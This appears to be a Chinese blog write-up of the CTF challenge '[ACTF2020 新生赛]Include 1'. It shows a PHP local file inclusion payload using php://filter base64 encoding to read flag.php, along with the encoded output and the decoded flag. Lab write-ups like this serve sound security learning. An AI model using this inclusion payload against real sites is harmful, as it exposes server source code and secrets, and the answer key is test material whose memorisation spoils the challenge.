本文主要是介绍[ACTF2020 新生赛]Include 1,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
题目环境:
超链接,点进去看看
你能找到flag吗?
除了这些网页什么都没有,但是不当紧,因为我们有一双善于发现的眼睛👀
F12瞅瞅
无,并无其他
等等URL看了吗?
发现存在一个参数file,并且已经给出flag.php文件了
主题题目名称Include,意为文件包含,大部分文件包含都要用到PHP伪协议
通过PHP伪协议构造payload:URL/?file=php://filter/read=convert.base64-encode/resource=flag.php
通过PHP伪协议读取flag.php文件,并通过base64编码格式显示出来
想要了解更多PHP伪协议可以看我这篇同类题目,希望对大家的学习有所帮助
fileclude-CTF 解题思路-CSDN博客
回显结果:
PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7NDAwZjJiYzYtOGI2Mi00NWEyLTg1ZDQtMmVkYzU0MjY4MTU0fQo=
base64解码一把梭
得出flag:**flag{400f2bc6-8b62-45a2-85d4-2edc54268154}**
这篇关于[ACTF2020 新生赛]Include 1的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
![[SWPUCTF 2021 新生赛]web方向(一到六题) 解题思路,实操解析,解题软件使用,解题方法教程](https://i-blog.csdnimg.cn/direct/bcfaab8e5a68426b8abfa71b5124a20d.png)
![[SWPUCTF 2023 秋季新生赛]Pingpingping](https://i-blog.csdnimg.cn/direct/c1a0bebbd527445f9366a67f892e6d2f.png)
